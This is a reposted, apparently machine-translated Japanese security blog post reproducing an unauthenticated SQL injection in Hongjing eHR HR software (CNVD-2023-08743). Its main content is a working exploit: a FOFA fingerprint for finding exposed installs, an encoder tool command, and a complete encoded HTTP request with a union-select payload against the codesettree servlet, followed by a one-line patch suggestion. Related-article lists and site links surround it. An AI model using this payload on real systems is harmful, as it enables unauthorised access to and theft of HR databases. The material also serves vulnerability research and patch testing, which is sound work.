Honjing eHR SQL インジェクションの脆弱性再発 (CNVD-2023-08743) - コードワールド

Honjing eHR SQL インジェクションの脆弱性再発 (CNVD-2023-08743)

情報 2023-06-05 01:52:42 訪問数: null

0x01 製品紹介

Honjing eHR 人事管理ソフトウェアは、動的、協調的、プロセス指向、戦略的なニーズを満たすために、人事管理とデジタルアプリケーションを統合するソフトウェアです。

0x02 脆弱性の概要

Honjing eHR には SQL インジェクションの脆弱性があり、認証されていないリモート攻撃者がこの脆弱性を利用して任意の SQL コマンドを実行し、データベースの機密情報を盗む可能性があります。

0x03 影響範囲

紅京 eHR < 8.2

0x04 再発環境

FOFA：body='<div class="hj-hy-all-one-logo"'

0x05 脆弱性の再発

PoC (注入ポイントはカテゴリフィールドです)

/servlet/codesettree?categories=[加密后的恶意sql]&codesetid=1&flag=c&parentid=-1&status=1

注: ここでは、SQL ステートメントを hrms でエンコードする必要があります。

ツールアドレス: https://github.com/vaycore/HrmsTool

java -jar HrmsTool.jar -e "1' union all select 'hongjing',@@version--"

ペイロードの構築 (クエリデータベースのバージョン)

GET /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

正常に再現されました

0x06 修復の提案

現在、このソフトウェアはセキュリティ修復アップデートをリリースしており、影響を受けるユーザーは製造元に連絡してパッチを入手できます。

おすすめ

転載: blog.csdn.net/qq_41904294/article/details/130944159

Honjing eHR SQL インジェクションの脆弱性再発 (CNVD-2023-08743)

Hongjing eHR SQL injection vulnerability recurrence (CNVD-2023-08743)

Повторное появление уязвимости Hongjing eHR SQL-инъекций (CNVD-2023-08743)

Honjing eHR 任意ファイルアップロードの脆弱性再発 (0day)

Reproduce Hongjing HCM codesettree SQL injection vulnerability (CNVD-2023-08743)

Fanwei e-cology9 SQL インジェクションの脆弱性再発 (QVD-2023-5012)

Panwei E-Cology SQL インジェクションの脆弱性が再発【QVD-2023-15672】

Fanwei e-cology9 SQL インジェクションの脆弱性が再発【QVD-2023-5012】

Wiederauftreten der eHR-SQL-Injection-Schwachstelle in Hongjing (CNVD-2023-08743)

Recurrencia de vulnerabilidad de inyección SQL de Hongjing eHR (CNVD-2023-08743)

Hongjing eHR SQL 인젝션 취약점 재발(CNVD-2023-08743)

【脆弱性再発】Smanga 不正リモートコード実行の脆弱性（CVE-2023-36076）追加のSQLインジェクション+任意ファイル読み取り

Honfan OA SQL インジェクションの脆弱性が再発

COSCO Kirin Fortress Machine SQL インジェクションの脆弱性が再発

Tongda OA11.7バックグラウンドSQLインジェクションgetshell脆弱性の再発

UFIDA KSOA SQL インジェクション脆弱性の再発 (HW0day)

【脆弱性再発】Fanwei e-cologyフロントデスクSQLインジェクションの脆弱性

[概要]脆弱性SQLインジェクションの脆弱性

脆弱性再発 Panmicro OA E-Cology V9 browser.jsp SQL インジェクションの脆弱性

Apache Kafka Connect JNDI インジェクションの脆弱性の再発 (CVE-2023-25194)

脆弱性再発 - Mingfei CMS cmscontentlist インターフェイス SQL インジェクション (脆弱性検出スクリプト付き)

SQLインジェクションとXSSの脆弱性

Jeecg-Boot にはフォアグラウンド SQL インジェクションの脆弱性があります (CVE-2023-1454)

【脆弱性再発】Glodon OA脆弱性まとめ（情報漏洩＋SQLインジェクション＋ファイルアップロード）

SQLインジェクション脆弱性攻撃

SQLインジェクションの脆弱性の簡単な説明

Dahua Smart Park 統合管理プラットフォーム SQL インジェクションの脆弱性再発 (HW0day)

DVWAプロテストSQLインジェクションの脆弱性

SQLインジェクションの脆弱性分析Beescms_v4.0

脆弱性の再発 - スマートターミナルのオペレーティングプラットフォームのフロントデスクに一般的な SQL インジェクションの脆弱性 (脆弱性検出スクリプトが添付されている)

おすすめ

Open Source Daily | Chrome に組み込まれている Gemini の重要性は、中国の AI 追求に関する 5 つの大きな誤解ではありません。ECharts の創設者は魚を育てるために「海に行った」が、何もありません。驚き

中国のAIチームが「米国のために準備を進めている」という噂にマイクロソフトが反応

ランキング

配列内の重複要素を検索し、繰り返し回数の最小値から最大値までの順に並べ替えます es6

【C++学習記】Ten、C++デザインパターン - 抽象ファクトリーパターン

知人：素人の言語ランタイム（A）に

ist „collision.relativeVelocity.magnitude“ in Unity

Linuxダイナミックリンク（3）のPLTとGOTについて話す-パブリックGOTエントリ

leetcode。図L.207カリキュラム-Java

羅区[] P3518 [POI2011] SEJ、金庫

MySQL にクエリを実行するときに使用するインデックスを指定します

現在のユーザー環境変数とシステムのWin10ベースのビュー

十二の仕事 - あなたの誕生日

アーカイブ

もっと

2024-05-15(5)

2024-05-14(9)

2024-05-13(8)

2024-05-12(27)

2024-05-11(31)

2024-05-10(33)

2024-05-09(30)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)